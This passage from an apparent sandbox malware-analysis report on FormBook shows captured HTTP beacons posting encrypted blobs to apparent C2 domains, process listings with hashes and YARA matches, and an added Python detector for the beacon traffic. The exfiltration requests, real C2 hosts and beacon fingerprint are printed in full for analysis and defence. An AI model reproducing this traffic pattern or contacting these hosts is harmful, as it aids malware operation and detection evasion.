                                              Jul 3, 2024 16:41:44.099843979 CEST | 157 bytes | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                              Session ID: 23
                                              Source IP: 192.168.2.5
                                              Source Port: 49736
                                              Destination IP: 35.241.34.216
                                              Destination Port: 80
                                              PID: 5784
                                              Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:45.986387014 CEST | 1827 bytes | OUT | POST /7npk/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mg55aa.xyz
                                              Origin: http://www.mg55aa.xyz
                                              Referer: http://www.mg55aa.xyz/7npk/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 33 46 4d 31 35 55 75 50 36 30 5a 63 6c 68 59 64 50 4d 51 50 45 54 65 71 65 38 5a 59 5a 69 6d 52 54 78 67 76 37 37 68 32 76 34 31 39 6a 51 4a 73 66 55 55 6e 6b 6f 66 56 2f 31 63 68 41 79 73 65 67 47 70 61 6f 62 77 68 4f 49 7a 56 6c 45 42 38 35 72 53 4f 51 67 54 77 5a 56 68 35 68 34 41 39 6a 52 39 45 68 64 30 2f 74 44 6e 52 6e 45 4e 4f 69 52 45 34 78 77 73 5a 53 70 42 49 51 7a 41 36 42 6d 68 58 43 59 4d 6a 46 69 47 50 38 31 70 54 51 74 31 43 70 42 79 4d 50 61 79 39 78 48 71 2f 54 54 69 57 79 6a 65 79 49 37 6b 6c 4a 2f 76 42 55 76 6a 75 63 7a 76 59 36 41 62 5a 75 5a 36 72 58 4b 51 66 46 70 46 63 4f 65 57 4e 6b 74 70 6f 44 53 79 54 36 35 56 74 33 36 50 53 71 6f 6c 54 53 4d 49 76 41 45 56 50 63 47 2f 4f 6a 73 2f 31 6c 43 62 64 41 4d 44 47 31 75 36 32 79 65 4b 50 35 4f 2b 4b 4b 52 70 2f 62 4c 42 75 42 64 79 61 72 52 52 72 71 6b 64 4a 66 72 34 38 6c 42 73 36 68 45 43 4c 41 30 56 72 36 76 2b 7a 51 61 7a 30 70 54 69 74 5a 54 64 69 63 78 41 79 69 46 61 56 78 [TRUNCATED]
                                              Data Ascii: k06T=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZimRTxgv77h2v419jQJsfUUnkofV/1chAysegGpaobwhOIzVlEB85rSOQgTwZVh5h4A9jR9Ehd0/tDnRnENOiRE4xwsZSpBIQzA6BmhXCYMjFiGP81pTQt1CpByMPay9xHq/TTiWyjeyI7klJ/vBUvjuczvY6AbZuZ6rXKQfFpFcOeWNktpoDSyT65Vt36PSqolTSMIvAEVPcG/Ojs/1lCbdAMDG1u62yeKP5O+KKRp/bLBuBdyarRRrqkdJfr48lBs6hECLA0Vr6v+zQaz0pTitZTdicxAyiFaVxPv/T12QB7MK3ZTWRyM01clXqlQ9pHnsxxBv9DNDVfh0cfbnDk+57NNKEA4AXpeljY1AsRHeGsqWZuvytNPaCmOz7UUPe2WHlJkIzy7Zqq4ym0qPE9OCuaqoM3FeHS0zt4DpVG7ZJ7Q66ITHaqWk1dI/5oVu4CzKgx16gqaB4ZTrNh569GHhuH4UQDF9D5gUFm/AToq0ijwIKSadZADmEg9u/+5LFB+/gUr0b0hDhSIC+3kvL8lHGAZq54bmhGDSqCjCWe0iJi4HpES2dE7y3ExiiSczSRBzqr2V6z5QUxPbjFQVYjGm0BaX01x7kJc4ddg06rSex3rimIxVA1c3cMal136gpMhMadSl03YzgjelNtI2LJoiT8eCslKOzBRqgMmXbiD4rLJbKLkQxm+Dm0g4ENEVuhifuqeTUa+gvlKcyvLh10W+0RqVSv24aw0t9Gsvg7FFApkiNr2KzMicE/io/9TyQYZQIYaxK8XX2hpI6i9AqhiNPOE/LX/clt3Wy7ywrmlHUKttKTdu1ibjwORLOONzS9sU0sUccQ3qk8dm8lqnPjKBSQ8180u9Zym8XW+7AU17inLkzICtGpR3rOxlSYtWn+5vr9/XOlCKfso5mvfXiYm9JoB9kTZnIp9y1jZl0Tl0orANdAYuOUWUlOdPB4lRv/YGjEt [TRUNCATED]
                                              Jul 3, 2024 16:41:46.698823929 CEST | 176 bytes | IN | HTTP/1.1 405 Method Not Allowed
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:46.702044010 CEST | 157 bytes | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                              Session ID: 24
                                              Source IP: 192.168.2.5
                                              Source Port: 49737
                                              Destination IP: 35.241.34.216
                                              Destination Port: 80
                                              PID: 5784
                                              Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:48.696413040 CEST | 542 bytes | OUT | GET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mg55aa.xyz
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:41:49.340217113 CEST | 300 bytes | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 5161
                                              Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                              Vary: Accept-Encoding
                                              ETag: "65a4939c-1429"
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:49.355428934 CEST | 1236 bytes | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                              Jul 3, 2024 16:41:49.355463982 CEST | 1236 bytes | IN | Data Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                              Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                              Jul 3, 2024 16:41:49.355475903 CEST | 1236 bytes | IN | Data Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                              Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                              Jul 3, 2024 16:41:49.355667114 CEST | 1236 bytes | IN | Data Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                              Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                              Jul 3, 2024 16:41:49.355676889 CEST | 217 bytes | IN | Data Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                              Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                              Session ID: 25
                                              Source IP: 192.168.2.5
                                              Source Port: 49738
                                              Destination IP: 74.208.46.171
                                              Destination Port: 80
                                              PID: 5784
                                              Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:54.409286022 CEST | 817 bytes | OUT | POST /i1fz/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lavillitadepapa.com
                                              Origin: http://www.lavillitadepapa.com
                                              Referer: http://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 5a 49 52 32 74 4f 6b 6d 62 53 55 68 52 63 66 54 63 33 61 66 41 32 61 43 69 5a 58 4c 57 32 43 52 6b 49 32 6c 45 31 42 36 2f 53 62 2b 7a 41 41 52 53 50 37 67 54 74 66 38 4e 55 6e 69 67 4e 39 55 7a 7a 48 4d 6b 68 69 50 34 47 2f 62 70 37 62 32 6b 39 6a 75 4f 30 4c 69 46 33 47 44 53 30 48 77 4f 48 50 50 33 69 5a 31 46 66 33 7a 74 6f 57 4a 77 63 2f 70 70 61 37 30 4e 39 48 71 53 68 42 51 57 46 2f 48 43 30 53 55 47 4b 65 52 2b 52 64 6f 74 69 76 49 41 43 55 49 6e 5a 31 48 70 33 77 62 47 4d 49 70 4f 2b 7a 33 70 5a 56 6c 55 53 44 57 68 4c 33 74 79 36 47 7a 6a 45 4d 3d
                                              Data Ascii: k06T=3/Wb1KmkdWhAZIR2tOkmbSUhRcfTc3afA2aCiZXLW2CRkI2lE1B6/Sb+zAARSP7gTtf8NUnigN9UzzHMkhiP4G/bp7b2k9juO0LiF3GDS0HwOHPP3iZ1Ff3ztoWJwc/ppa70N9HqShBQWF/HC0SUGKeR+RdotivIACUInZ1Hp3wbGMIpO+z3pZVlUSDWhL3ty6GzjEM=
                                              Jul 3, 2024 16:41:54.940505028 CEST | 466 bytes | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:54 GMT
                                              Server: Apache
                                              Location: https://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 245
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                                              Session ID: 26
                                              Source IP: 192.168.2.5
                                              Source Port: 49739
                                              Destination IP: 74.208.46.171
                                              Destination Port: 80
                                              PID: 5784
                                              Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:56.950323105 CEST | 837 bytes | OUT | POST /i1fz/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lavillitadepapa.com
                                              Origin: http://www.lavillitadepapa.com
                                              Referer: http://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 57 49 42 32 76 74 38 6d 54 53 55 6d 64 38 66 54 54 58 61 62 41 32 57 43 69 59 69 4d 57 6a 61 52 6b 6f 6d 6c 44 30 42 36 34 53 62 2b 39 67 41 59 66 76 37 70 54 74 54 46 4e 56 62 69 67 4e 70 55 7a 33 50 4d 6b 53 61 49 34 57 2b 39 6b 62 62 34 67 39 6a 75 4f 30 4c 69 46 32 69 6c 53 30 76 77 4f 58 54 50 32 44 5a 32 44 76 33 38 39 59 57 4a 36 38 2f 74 70 61 37 64 4e 38 62 41 53 6c 78 51 57 46 50 48 43 6c 53 4c 49 4b 65 62 77 78 64 38 38 41 75 66 42 42 55 6e 36 71 41 55 31 6c 38 39 4b 61 6c 44 55 63 37 66 36 35 35 64 45 42 4c 68 77 37 57 45 6f 5a 57 44 39 54 59 39 66 41 47 6b 48 72 75 75 77 59 48 31 6d 7a 52 51 4e 74 54 63
                                              Data Ascii: k06T=3/Wb1KmkdWhAWIB2vt8mTSUmd8fTTXabA2WCiYiMWjaRkomlD0B64Sb+9gAYfv7pTtTFNVbigNpUz3PMkSaI4W+9kbb4g9juO0LiF2ilS0vwOXTP2DZ2Dv389YWJ68/tpa7dN8bASlxQWFPHClSLIKebwxd88AufBBUn6qAU1l89KalDUc7f655dEBLhw7WEoZWD9TY9fAGkHruuwYH1mzRQNtTc
                                              Jul 3, 2024 16:41:57.469104052 CEST | 466 bytes | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:57 GMT
                                              Server: Apache
                                              Location: https://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 245
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>
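
The six sessions above are one beacon repeated: a POST (once a GET) to a four-character directory, a single short-named form parameter carrying an opaque base64 blob, Origin and Referer forged to point back at the same path, an iPad Safari User-Agent, Cache-Control: no-cache and Connection: close, and replies of 405, 301 or an unrelated landing page because FormBook cycles through a list of candidate domains, most of which are not the live C2. The following is an added example, not part of the Joe Sandbox report, that turns those traits into a request-level detector and IOC extractor. The two positive samples are the session 22 POST and the session 24 GET copied from above with the unused Accept headers dropped; the indicator names, the score threshold and the intranet.example negative control are my own constructions.

```python
import re
from dataclasses import dataclass

# User-Agent string sent verbatim in every request of sessions 21-26 above.
IPAD_UA = ("Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 "
           "(KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")  # opaque base64-looking blob
KEY_RE = re.compile(r"^[A-Za-z0-9]{3,6}$")          # short parameter name such as k06T
PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")         # /7npk/ and /i1fz/ in the sessions above


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict  # header names lower-cased
    body: str


def parse_http_request(raw: str) -> HttpRequest:
    """Minimal HTTP/1.1 request parser: request line, header block, raw body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)


def split_form(data: str) -> dict:
    """Split k=v&k=v pairs WITHOUT percent/plus decoding, so base64 '+' and '/' survive."""
    return {k: v for k, _, v in (p.partition("=") for p in data.split("&") if p)}


def formbook_indicators(req: HttpRequest) -> list:
    """Names (my own labels) of the FormBook-style traits present in one request."""
    h, hits = req.headers, []
    path, _, query = req.target.partition("?")
    host = h.get("host", "")
    if h.get("user-agent") == IPAD_UA:
        hits.append("ipad-7_1_2-user-agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if h.get("cache-control", "").lower() == "no-cache":
        hits.append("cache-control-no-cache")
    if PATH_RE.match(path):
        hits.append("four-char-directory")
    if req.method == "POST":
        # Origin and Referer are forged to point back at the C2 path itself.
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
            hits.append("origin-referer-point-at-self")
        form = split_form(req.body)
        if len(form) == 1:
            (key, value), = form.items()
            if KEY_RE.match(key) and B64_RE.match(value):
                hits.append("single-base64-form-param")
    elif req.method == "GET":
        q = split_form(query)
        if "rz" in q and any(KEY_RE.match(k) and B64_RE.match(v) for k, v in q.items()):
            hits.append("rz-plus-base64-query")
    return hits


def is_formbook_beacon(req: HttpRequest, threshold: int = 4) -> bool:
    """Threshold of 4 is my choice: the POST beacons score 6 here, the GET scores 4."""
    return len(formbook_indicators(req)) >= threshold


def extract_iocs(req: HttpRequest) -> dict:
    """Pull the host, the C2 directory and the name of the encrypted-blob parameter."""
    path, _, query = req.target.partition("?")
    params = split_form(req.body if req.method == "POST" else query)
    blob_keys = [k for k, v in params.items() if KEY_RE.match(k) and B64_RE.match(v)]
    return {"host": req.headers.get("host"), "path": path,
            "param": blob_keys[0] if blob_keys else None}


# Session 22 POST and session 24 GET as captured above (Accept headers dropped).
# BENIGN_SAMPLE is a constructed login request used as a negative control.
POST_SAMPLE = (
    "POST /7npk/ HTTP/1.1\r\n"
    "Host: www.mg55aa.xyz\r\n"
    "Origin: http://www.mg55aa.xyz\r\n"
    "Referer: http://www.mg55aa.xyz/7npk/\r\n"
    "Content-Length: 225\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {IPAD_UA}\r\n\r\n"
    "k06T=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZi+RUCov6Y529o199AJtfUV9koXr/0hUA2cejg9a5awhEIzV6UB5k7SfQgDOZVx5h4A9jXRE3ZA/+TnOukNSmREcxw0vSpF2QCg6BHRXEr0jGCGN/1oAQtpRpFq6PauXxFq/CVPXmwrtKqM/CtjTDr30XgSvxhzDytuVYsUPHaERVorbqYYo"
)
GET_SAMPLE = (
    "GET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1\r\n"
    "Host: www.mg55aa.xyz\r\n"
    "Connection: close\r\n"
    f"User-Agent: {IPAD_UA}\r\n\r\n"
)
BENIGN_SAMPLE = (
    "POST /login HTTP/1.1\r\n"
    "Host: intranet.example\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/126.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 27\r\n"
    "Connection: keep-alive\r\n\r\n"
    "user=alice&password=secret1"
)

if __name__ == "__main__":
    for raw in (POST_SAMPLE, GET_SAMPLE, BENIGN_SAMPLE):
        req = parse_http_request(raw)
        print(req.method, req.target[:12], is_formbook_beacon(req), formbook_indicators(req), extract_iocs(req))
```

The form parser deliberately avoids urllib's parse_qs, which would turn the '+' characters inside the base64 blob into spaces and break the blob check; a proxy log or IDS feed that has already URL-decoded the body needs the regex relaxed to accept spaces. The four-character directory and the parameter name change per build, so the host, path and parameter returned by extract_iocs are what to pivot on, not fixed strings.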


                                              Target ID:0
                                              Start time:10:38:50
                                              Start date:03/07/2024
                                              Path:C:\Users\user\Desktop\GJRX21GBj3.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\GJRX21GBj3.exe"
                                              Imagebase:0x7ff658550000
                                              File size:1'951'744 bytes
                                              MD5 hash:804CC1B2769F38027FD2C2BF8141013B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:10:38:50
                                              Start date:03/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:10:38:51
                                              Start date:03/07/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):
                                              Commandline:"C:\Windows\System32\svchost.exe"
                                              Imagebase:
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:10:38:51
                                              Start date:03/07/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                              Imagebase:0xd80000
                                              File size:144'344 bytes
                                              MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:10:39:05
                                              Start date:03/07/2024
                                              Path:C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe"
                                              Imagebase:0xdf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
